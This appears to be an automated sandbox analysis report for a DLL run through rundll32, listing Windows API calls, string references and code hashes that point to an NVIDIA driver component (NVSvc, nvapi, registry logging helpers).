                                                                      • Part of subcall function 00007FF8A8DDFDD0: HeapFree.KERNEL32(?,?,00000000,00007FF8A8DE0848,?,?,00002F2295E69E2A,00007FF8A8DCD349,?,?,?,?,00007FF8A8DDCE56,?,?,00000000), ref: 00007FF8A8DDFDE6
                                                                      • Part of subcall function 00007FF8A8DDFDD0: GetLastError.KERNEL32(?,?,00000000,00007FF8A8DE0848,?,?,00002F2295E69E2A,00007FF8A8DCD349,?,?,?,?,00007FF8A8DDCE56,?,?,00000000), ref: 00007FF8A8DDFDF8
                                                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF8A8DE4EA1), ref: 00007FF8A8DE4C94
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                    • String ID: ?
                                                                    • API String ID: 3458911817-1684325040
                                                                    • Opcode ID: 22439416785a112f76fe9419c4e8c31dab3d3793bf624b84bd0cee521d5097a6
                                                                    • Instruction ID: 18fa43b76780a085fd33a8dc785e09328f87563211ea5b576bddd85177d0d2fd
                                                                    • Opcode Fuzzy Hash: 22439416785a112f76fe9419c4e8c31dab3d3793bf624b84bd0cee521d5097a6
                                                                    • Instruction Fuzzy Hash: 5A61E332A0AA42ABE760EF21E8401B97BA5FF447D4F440131EA5D43A95EF3CE855C768
                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(?,?,?,?,?,00000020,00000000,?,00007FF8A8DB9596,?), ref: 00007FF8A8DB90BA
                                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,00000020,00000000,?,00007FF8A8DB9596,?), ref: 00007FF8A8DB90CA
                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,00000020,00000000,?,00007FF8A8DB9596,?), ref: 00007FF8A8DB9269
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: Time$AddressFileHandleModuleProcSystem
                                                                    • String ID: GetTickCount64$KERNEL32.DLL
                                                                    • API String ID: 1325709388-3320051239
                                                                    • Opcode ID: e5f6e237485dc9fb21dbce2a5ed82c903e844033b7c074c3668ca47f24bd9165
                                                                    • Instruction ID: 505deda3e98409c8c99d9e029db16455beff3d46cf3e0df1a91796f3cef94ac2
                                                                    • Opcode Fuzzy Hash: e5f6e237485dc9fb21dbce2a5ed82c903e844033b7c074c3668ca47f24bd9165
                                                                    • Instruction Fuzzy Hash: 90519162F2675699EF04DBA5E8500EC6371FB88BC8B445032EE1E1BB99EF3CE1058354
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: CriticalCurrentErrorInitializeLastSectionThread
                                                                    • String ID: NVSvc$NVSvc
                                                                    • API String ID: 2717818847-2528201179
                                                                    • Opcode ID: 8dcdf2550344e87295149939ece467c90dbcbdf0e4751995e937b7b7eb2bc959
                                                                    • Instruction ID: 24a02d050753987b9d64aa148ff1688c615626a6e98d1ac8d4ad45eaf32d42b0
                                                                    • Opcode Fuzzy Hash: 8dcdf2550344e87295149939ece467c90dbcbdf0e4751995e937b7b7eb2bc959
                                                                    • Instruction Fuzzy Hash: AD411231A0AB52F2F7418B14E8402B933A4FF64BD8F54013AD99D436A4EF7CA5B58778
                                                                    APIs
                                                                    Strings
                                                                    • void __cdecl Nvidia::Logging::RegistryKey::CheckErrorCode(long,const char *), xrefs: 00007FF8A8D03AFA
                                                                    • c:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\logging\logging.lib\RegistryKey.h, xrefs: 00007FF8A8D03AF3
                                                                    • RegOpenKeyEx, xrefs: 00007FF8A8D03AC8
                                                                    Similarity
                                                                    • API ID: Deallocatestd::_$CloseOpen__std_exception_copythrow_exception
                                                                    • String ID: RegOpenKeyEx$c:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\logging\logging.lib\RegistryKey.h$void __cdecl Nvidia::Logging::RegistryKey::CheckErrorCode(long,const char *)
                                                                    • API String ID: 239400870-1403648629
                                                                    • Opcode ID: f055ff398399059ae8927227b57d428e8287537a93d480e565a91b4db700cde7
                                                                    • Instruction ID: 33bb33a5880e76a903d97e657f7271bbdb7f6e81966c13661e3bf99c9608b1de
                                                                    • Opcode Fuzzy Hash: f055ff398399059ae8927227b57d428e8287537a93d480e565a91b4db700cde7
                                                                    • Instruction Fuzzy Hash: 5011B631B0AA82D2EB10CB29E45076973A0FB89BE4F404131DA6D477A4DF3CE555C758
                                                                    APIs
                                                                    Similarity
                                                                    • API ID: _set_statfp
                                                                    • String ID:
                                                                    • API String ID: 1156100317-0
                                                                    • Opcode ID: fa9f4140ac8c3c0c1d9f647f0c4365783f45b4630c9665bc1a543104a0a27ffe
                                                                    • Instruction ID: b5268fe4d6c5d88c9de0753b042ab776d3a492e3a2c4f89721a2777f1cee0340
                                                                    • Opcode Fuzzy Hash: fa9f4140ac8c3c0c1d9f647f0c4365783f45b4630c9665bc1a543104a0a27ffe
                                                                    • Instruction Fuzzy Hash: 5E513E26D0AE46E7F622AE34944037A6372FF417D4F044B39D96D175D0FF3CA8998628
                                                                    APIs
                                                                      • Part of subcall function 00007FF8A8D04D08: WaitForSingleObjectEx.KERNEL32 ref: 00007FF8A8D04D62
                                                                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF8A8DB8BF8), ref: 00007FF8A8D4417C
                                                                    • ReleaseSemaphore.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF8A8DB8BF8), ref: 00007FF8A8D44196
                                                                    • ReleaseSemaphore.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF8A8DB8BF8), ref: 00007FF8A8D441B7
                                                                      • Part of subcall function 00007FF8A8D04DB0: CreateEventA.KERNEL32 ref: 00007FF8A8D04DEA
                                                                      • Part of subcall function 00007FF8A8D04DB0: CloseHandle.KERNEL32 ref: 00007FF8A8D04E19
                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF8A8DB8BF8), ref: 00007FF8A8D441F9
                                                                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF8A8DB8BF8), ref: 00007FF8A8D4422D
                                                                    Similarity
                                                                    • API ID: Event$CloseHandleReleaseSemaphore$CreateObjectSingleWait
                                                                    • String ID:
                                                                    • API String ID: 1436492870-0
                                                                    • Opcode ID: df526144e84990efae223006a84edff3b767429f22f46508a8fe73c342c2743a
                                                                    • Instruction ID: f76284465001806a16eb0e71f8196d06a17dba19a4114794d6890e8bb22cbdec
                                                                    • Opcode Fuzzy Hash: df526144e84990efae223006a84edff3b767429f22f46508a8fe73c342c2743a
                                                                    • Instruction Fuzzy Hash: 2D319331A1BA0293EBA4CB25A45423E6762FB56BE0F144230DBBF47A91DF3CE4458758
                                                                    APIs
                                                                    Similarity
                                                                    • API ID: std::_$LockitLockit::~_$ExceptionFacet_RegisterThrowstd::bad_alloc::bad_alloc
                                                                    • String ID:
                                                                    • API String ID: 4037175018-0
                                                                    • Opcode ID: 18ebb4d36de1deb9e8f84cc13266950ec36b17d3039d761a23553b459d15360a
                                                                    • Instruction ID: 002a5029a8430268844f00a8053a9a631af2935964acb1de47ae316aa83ce246
                                                                    • Opcode Fuzzy Hash: 18ebb4d36de1deb9e8f84cc13266950ec36b17d3039d761a23553b459d15360a
                                                                    • Instruction Fuzzy Hash: E1316531A0EA42B1EA11DB15E4400B96762FF847E4F580231DA7D03AE9DF3CE456C368
                                                                    APIs
                                                                    Similarity
                                                                    • API ID: std::_$LockitLockit::~_$ExceptionFacet_RegisterThrowstd::bad_alloc::bad_alloc
                                                                    • String ID:
                                                                    • API String ID: 4037175018-0
                                                                    • Opcode ID: b8bb389a5e621f25b26d9608e0b2ee073185df6d26e955209668fd3c4078155f
                                                                    • Instruction ID: 2b30cae67858db47d438c8df2204b49cf47e22269e86144226f79b98442ee9f4
                                                                    • Opcode Fuzzy Hash: b8bb389a5e621f25b26d9608e0b2ee073185df6d26e955209668fd3c4078155f
                                                                    • Instruction Fuzzy Hash: E9315632A0EA42B1FB219B25E4400B96361EF947E4F180231DA7E03BE5DF3CE456D768
                                                                    APIs
                                                                    Similarity
                                                                    • API ID: std::_$LockitLockit::~_$ExceptionFacet_RegisterThrowstd::bad_alloc::bad_alloc
                                                                    • String ID:
                                                                    • API String ID: 4037175018-0
                                                                    • Opcode ID: 38ee4250fbb25fc554b4fee117d75308bde01d93ea8f5b547f4d4860aced5323
                                                                    • Instruction ID: 55cdde7b3c9192494ab8413a422dabf4550cf41c625fb5009ec63d12e622b53a
                                                                    • Opcode Fuzzy Hash: 38ee4250fbb25fc554b4fee117d75308bde01d93ea8f5b547f4d4860aced5323
                                                                    • Instruction Fuzzy Hash: 03318532A0EA42B1EB159B15E8400BD6371EF847E4F180631DA7D03AE5DF3CE456C728
                                                                    APIs
                                                                    Similarity
                                                                    • API ID: std::_$LockitLockit::~_$ExceptionFacet_RegisterThrowstd::bad_alloc::bad_alloc
                                                                    • String ID:
                                                                    • API String ID: 4037175018-0
                                                                    • Opcode ID: 89e9db4c931ab1bf3cdbb28d2ba2b13d26839fe9728c879ca91f479a5de63860
                                                                    • Instruction ID: 7d6fe95e8baf400c6ee89f2f3499b80967ff0c4c6e6f775894db2a51fcd13f73
                                                                    • Opcode Fuzzy Hash: 89e9db4c931ab1bf3cdbb28d2ba2b13d26839fe9728c879ca91f479a5de63860
                                                                    • Instruction Fuzzy Hash: 8F311032A0EA42A1EB11DB25E5400B96761EF947E4F180632DA7D07BE9DF3CE456C728
                                                                    APIs
                                                                    Similarity
                                                                    • API ID: std::_$LockitLockit::~_$ExceptionFacet_RegisterThrowstd::bad_alloc::bad_alloc
                                                                    • String ID:
                                                                    • API String ID: 4037175018-0
                                                                    • Opcode ID: 91d7009424cf7f8f6273e284ac38f090ccebdf3a332c76e25038c969edfad724
                                                                    • Instruction ID: 3f2cee0c2821c936527b5ef095784bea611924b35528aea5e80f8187db470469
                                                                    • Opcode Fuzzy Hash: 91d7009424cf7f8f6273e284ac38f090ccebdf3a332c76e25038c969edfad724
                                                                    • Instruction Fuzzy Hash: 4E313332A0EE42A1EB119B25E5400B96761EF947E4F180231DA6D43BE5DF3CE456C768
                                                                    APIs
                                                                    Similarity
                                                                    • API ID: std::_$LockitLockit::~_$ExceptionFacet_RegisterThrowstd::bad_alloc::bad_alloc
                                                                    • String ID:
                                                                    • API String ID: 4037175018-0
                                                                    • Opcode ID: f348b5a8d20156a74959f8356c0bad4ce0e4209d7e9d697c9d0d97b5adfd605d
                                                                    • Instruction ID: 1e99a749cc3bb8275e0da766bbf908b369f07f64c5ebbe2e3dd09f502961ba2d
                                                                    • Opcode Fuzzy Hash: f348b5a8d20156a74959f8356c0bad4ce0e4209d7e9d697c9d0d97b5adfd605d
                                                                    • Instruction Fuzzy Hash: BA315372A0EA42B1EB119B25E5400B96361FF947E4F180232DA7D03AE5DF3CE45AC768
                                                                    APIs
                                                                    Similarity
                                                                    • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 2067211477-0
                                                                    • Opcode ID: b11c5641bf4848fb608eb9749dc857ac8897b4fee8caf6aa4f1a069ddcab5a7a
                                                                    • Instruction ID: d9e2af642f17cad82e8651c8c46ef1ee2e6e8a22bcf8a3d68fa8683ec29e4505
                                                                    • Opcode Fuzzy Hash: b11c5641bf4848fb608eb9749dc857ac8897b4fee8caf6aa4f1a069ddcab5a7a
                                                                    • Instruction Fuzzy Hash: FD215B35A0B742A2EF15DBA1E41057AA2A4FF84BC0F080431DA6D43B55EF3CE918C628
                                                                    APIs
                                                                    Similarity
                                                                    • API ID: _com_issue_error$Initialize$Security
                                                                    • String ID:
                                                                    • API String ID: 601672203-0
                                                                    • Opcode ID: 71e2f57c4ad06176b4a5f6e6c297fe6c2ad8f9ea88118bc92160f530134c9719
                                                                    • Instruction ID: 36b8ab13167ea56227b4753055797686b85f437904be2e63bc99185d333352ed
                                                                    • Opcode Fuzzy Hash: 71e2f57c4ad06176b4a5f6e6c297fe6c2ad8f9ea88118bc92160f530134c9719
                                                                    • Instruction Fuzzy Hash: A601C030F2A342A2FB609B30A84133A2951FB813E4F504238D5BA836C0EF7CE0498628
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: DirectoryLocalSystem$AllocErrorFreeLast
                                                                    • String ID:
                                                                    • API String ID: 3438206570-0
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo
                                                                    • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                    • API String ID: 3215553584-1196891531
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Init_thread_footerswprintf
                                                                    • String ID: Failed to allocate memory$GridCloudLicensingTrustedStorage.cpp$_tsReadContent
                                                                    • API String ID: 732731317-3783116900
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Getcvt
                                                                    • String ID: false$true
                                                                    • API String ID: 1921796781-2658103896
                                                                    APIs
                                                                    • GetProcAddress.KERNEL32(?,?,00000000,00007FF8A8D94FF7,?,?,00000000,00007FF8A8D95263,?,?,00000000,00007FF8A8D95500,?,?,?,00007FF8A8D2F206), ref: 00007FF8A8D9507F
                                                                    • GetProcAddress.KERNEL32(?,?,00000000,00007FF8A8D94FF7,?,?,00000000,00007FF8A8D95263,?,?,00000000,00007FF8A8D95500,?,?,?,00007FF8A8D2F206), ref: 00007FF8A8D95096
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: AddressProc
                                                                    • String ID: nvapi_Direct_GetMethod$nvapi_QueryInterface
                                                                    • API String ID: 190572456-541830060
                                                                    APIs
                                                                      • Part of subcall function 00007FF8A8D2051C: __std_exception_copy.LIBVCRUNTIME ref: 00007FF8A8D2058E
                                                                      • Part of subcall function 00007FF8A8D96700: EnterCriticalSection.KERNEL32 ref: 00007FF8A8D96710
                                                                      • Part of subcall function 00007FF8A8D20048: __std_exception_copy.LIBVCRUNTIME ref: 00007FF8A8D200BA
                                                                    • _Init_thread_footer.LIBCMT ref: 00007FF8A8D1E9C3
                                                                    Strings
                                                                    • C:\dvs\p4\build\sw\tools\boost\boost-1.62.0\boost/exception/detail/exception_ptr.hpp, xrefs: 00007FF8A8D1E90D
                                                                    • bad exception, xrefs: 00007FF8A8D1E8CD
                                                                    • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 00007FF8A8D1E902
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: __std_exception_copy$CriticalEnterInit_thread_footerSection
                                                                    • String ID: C:\dvs\p4\build\sw\tools\boost\boost-1.62.0\boost/exception/detail/exception_ptr.hpp$bad exception$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
                                                                    • API String ID: 573191702-3549958519
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: AttributesCreateDirectoryErrorExceptionFileInit_thread_footerLastThrow
                                                                    • String ID: boost::filesystem::create_directory
                                                                    • API String ID: 724045827-2941204237
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: GetTickCount64$KERNEL32.DLL
                                                                    • API String ID: 1646373207-3320051239
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: CreateInit_thread_footerInstance
                                                                    • String ID: Create Sync Proxy singlton error$GetSyncProxy$NvXDCore.cpp
                                                                    • API String ID: 3436645735-4261199731
                                                                    APIs
                                                                    • GetSystemDirectoryW.KERNEL32(?,?,cryptnet.dll,00007FF8A8CFA9DB), ref: 00007FF8A8CFADDD
                                                                    • LocalAlloc.KERNEL32(?,?,cryptnet.dll,00007FF8A8CFA9DB), ref: 00007FF8A8CFADF9
                                                                    • GetSystemDirectoryW.KERNEL32(?,?,cryptnet.dll,00007FF8A8CFA9DB), ref: 00007FF8A8CFAE0C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: DirectorySystem$AllocLocal
                                                                    • String ID: cryptnet.dll
                                                                    • API String ID: 1371172169-1563376703
                                                                    • Opcode ID: 41d284b39d861a69d634d39cc0ac6990f4b671fd7f177f07053520ddd399bce1
                                                                    • Instruction ID: e80a0e2a5286e2c42bbf8e11bbe88d8f4c87fe4a51f2c78bdf59b5e04eaa8505
                                                                    • Opcode Fuzzy Hash: 41d284b39d861a69d634d39cc0ac6990f4b671fd7f177f07053520ddd399bce1
                                                                    • Instruction Fuzzy Hash: 6E11B126A0A741A6FB449F62A44017DB2A1FF48FC4F884135DE4E43785EF7CF8228B18
                                                                    APIs
                                                                    • std::current_exception.LIBCMT ref: 00007FF8A8D2E367
                                                                    • std::runtime_error::runtime_error.LIBCPMT ref: 00007FF8A8D2E38A
                                                                      • Part of subcall function 00007FF8A8D00A2C: __std_exception_copy.LIBVCRUNTIME ref: 00007FF8A8D00A68
                                                                    • _CxxThrowException.LIBVCRUNTIME ref: 00007FF8A8D2E39B
                                                                      • Part of subcall function 00007FF8A8DC1390: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF8A8D9B7E3), ref: 00007FF8A8DC140D
                                                                      • Part of subcall function 00007FF8A8DC1390: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF8A8D9B7E3), ref: 00007FF8A8DC144C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Exception$FileHeaderRaiseThrow__std_exception_copystd::current_exceptionstd::runtime_error::runtime_error
                                                                    • String ID: SHGetFolderPathW failed with
                                                                    • API String ID: 530891933-2816540289
                                                                    • Opcode ID: 58610502b58b0b572c1adac7209f5f57e80d41dadf13108b99969dd46fc7d3b2
                                                                    • Instruction ID: 4a8009f017d8a78b6f3fbbaa62d743bda011913b274c44b114fdbab4bdddb4ee
                                                                    • Opcode Fuzzy Hash: 58610502b58b0b572c1adac7209f5f57e80d41dadf13108b99969dd46fc7d3b2
                                                                    • Instruction Fuzzy Hash: 1321B03270AB81A2EB20AB61E4843AE7360FF857D0F801235D7AD47A99EF7CD514CB04
                                                                    APIs
                                                                    Strings
                                                                    • void __cdecl Nvidia::Logging::RegistryKey::CheckErrorCode(long,const char *), xrefs: 00007FF8A8D03D29
                                                                    • c:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\logging\logging.lib\RegistryKey.h, xrefs: 00007FF8A8D03D22
                                                                    • RegOpenKeyEx, xrefs: 00007FF8A8D03CF7
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Open
                                                                    • String ID: RegOpenKeyEx$c:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\logging\logging.lib\RegistryKey.h$void __cdecl Nvidia::Logging::RegistryKey::CheckErrorCode(long,const char *)
                                                                    • API String ID: 71445658-1403648629
                                                                    • Opcode ID: 168d4153820dfa5bf4347ea5d55fdae4738c1ae759da0c2e42162f5cb4d04536
                                                                    • Instruction ID: 5143c0ef74e00e47834957335e1877afbf939fce7cb8fcb03c802336269f3205
                                                                    • Opcode Fuzzy Hash: 168d4153820dfa5bf4347ea5d55fdae4738c1ae759da0c2e42162f5cb4d04536
                                                                    • Instruction Fuzzy Hash: 4911003270AB46A1FB208B29F44076A6360FB86BE4F404231DA6C077A4CF3CD198CB58
                                                                    APIs
                                                                    Strings
                                                                    • void __cdecl Nvidia::Logging::RegistryKey::CheckErrorCode(long,const char *), xrefs: 00007FF8A8D0407B
                                                                    • c:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\logging\logging.lib\RegistryKey.h, xrefs: 00007FF8A8D04074
                                                                    • RegQueryValueEx, xrefs: 00007FF8A8D04049
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: QueryValue
                                                                    • String ID: RegQueryValueEx$c:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\logging\logging.lib\RegistryKey.h$void __cdecl Nvidia::Logging::RegistryKey::CheckErrorCode(long,const char *)
                                                                    • API String ID: 3660427363-2563057211
                                                                    • Opcode ID: 6403df39ea2b4c8683c83ac7e8edc363348eace101ee43b770daa147beb4f0ec
                                                                    • Instruction ID: 366e757239321b43e5727da5d9882871628b33887ef1ef956d6f5dca1b8183e2
                                                                    • Opcode Fuzzy Hash: 6403df39ea2b4c8683c83ac7e8edc363348eace101ee43b770daa147beb4f0ec
                                                                    • Instruction Fuzzy Hash: 7011DA7161EB42E1EB60CB14E440B6A7371FB857D4F402135E6AE03699DF3CD558CB14
                                                                    APIs
                                                                    • RegOpenKeyExW.ADVAPI32 ref: 00007FF8A8D039FC
                                                                      • Part of subcall function 00007FF8A8D03848: __std_exception_copy.LIBVCRUNTIME ref: 00007FF8A8D038F2
                                                                      • Part of subcall function 00007FF8A8D03848: std::_Deallocate.LIBCONCRT ref: 00007FF8A8D03915
                                                                      • Part of subcall function 00007FF8A8D03848: std::_Deallocate.LIBCONCRT ref: 00007FF8A8D03941
                                                                      • Part of subcall function 00007FF8A8D03848: std::_Deallocate.LIBCONCRT ref: 00007FF8A8D03965
                                                                      • Part of subcall function 00007FF8A8D03848: std::_Deallocate.LIBCONCRT ref: 00007FF8A8D03989
                                                                      • Part of subcall function 00007FF8A8D13874: throw_exception.LIBCPMT ref: 00007FF8A8D13900
                                                                    Strings
                                                                    • void __cdecl Nvidia::Logging::RegistryKey::CheckErrorCode(long,const char *), xrefs: 00007FF8A8D03A3A
                                                                    • c:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\logging\logging.lib\RegistryKey.h, xrefs: 00007FF8A8D03A33
                                                                    • RegOpenKeyEx, xrefs: 00007FF8A8D03A08
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Deallocatestd::_$Open__std_exception_copythrow_exception
                                                                    • String ID: RegOpenKeyEx$c:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\logging\logging.lib\RegistryKey.h$void __cdecl Nvidia::Logging::RegistryKey::CheckErrorCode(long,const char *)
                                                                    • API String ID: 2507522339-1403648629
                                                                    • Opcode ID: 1a8c7a166c5c236a1b3517bfebdfd1d2d6afa2ceb11a7d8eca7fe6af9cdc555c
                                                                    • Instruction ID: a75e7f7cc63999f1758b90fd515add0c717118d1e0b2c520ab682f9af5824add
                                                                    • Opcode Fuzzy Hash: 1a8c7a166c5c236a1b3517bfebdfd1d2d6afa2ceb11a7d8eca7fe6af9cdc555c
                                                                    • Instruction Fuzzy Hash: 27110632B0AA8291EB10CB29E8417A97360FB85BE4F904231DA6D437A4DF3DD556C748
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: CreateHardLinkW$kernel32.dll
                                                                    • API String ID: 1646373207-294928789
                                                                    • Opcode ID: 69d15db900f5ea381d2d1439874bf761b1340bd491aac249e4236d0d5bea90ca
                                                                    • Instruction ID: 74473784f85d39109da6c549c6f4153a8fd7fac338affbd60e704392cdabf139
                                                                    • Opcode Fuzzy Hash: 69d15db900f5ea381d2d1439874bf761b1340bd491aac249e4236d0d5bea90ca
                                                                    • Instruction Fuzzy Hash: 26D0C938E1BA42F1EB04AB01EC850A423A0FF547C1F800075C44D01320BF3CAA798368
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: CreateSymbolicLinkW$kernel32.dll
                                                                    • API String ID: 1646373207-1962376091
                                                                    • Opcode ID: 80caedae318dc50190f7938228b55261e8a6763591e7d84b28634753ea436a7e
                                                                    • Instruction ID: 9a799d0084efbb6f22d26fd7d15a45dfa5dacec09c3465527f17687e3e4f51cb
                                                                    • Opcode Fuzzy Hash: 80caedae318dc50190f7938228b55261e8a6763591e7d84b28634753ea436a7e
                                                                    • Instruction Fuzzy Hash: 38D0C278E5BA42E1EB04AB11EC9506823A0FB54792F814175D94D51360AF7CAA7A8728
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: CloseFileHandle$AttributesCreate
                                                                    • String ID:
                                                                    • API String ID: 1279197413-0
                                                                    • Opcode ID: e5e6221bda934534c7198b04ffb04633a1afd006daa703f7abc995b6117b968a
                                                                    • Instruction ID: 632f0ddb1317518f13870dc4f44dea12b6fada6a51f8cb4a9380ed4d32a9eed3
                                                                    • Opcode Fuzzy Hash: e5e6221bda934534c7198b04ffb04633a1afd006daa703f7abc995b6117b968a
                                                                    • Instruction Fuzzy Hash: 3751C272A0A6819AE7109F11E44837AB3A0FB85BE4F104234DBBD07AD5DF3CE4598758
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Virtual$AllocInfoProtectQuerySystem
                                                                    • String ID:
                                                                    • API String ID: 3562403962-0
                                                                    • Opcode ID: 04e6aaf630fafe1e3119f71ebd3d1127d44ed31f4638ad15e1e5b99fc79ebe75
                                                                    • Instruction ID: 26835b466dd28e856d933350bf3b699e8b937b42cc378bf2fb1e6cdb96639b96
                                                                    • Opcode Fuzzy Hash: 04e6aaf630fafe1e3119f71ebd3d1127d44ed31f4638ad15e1e5b99fc79ebe75
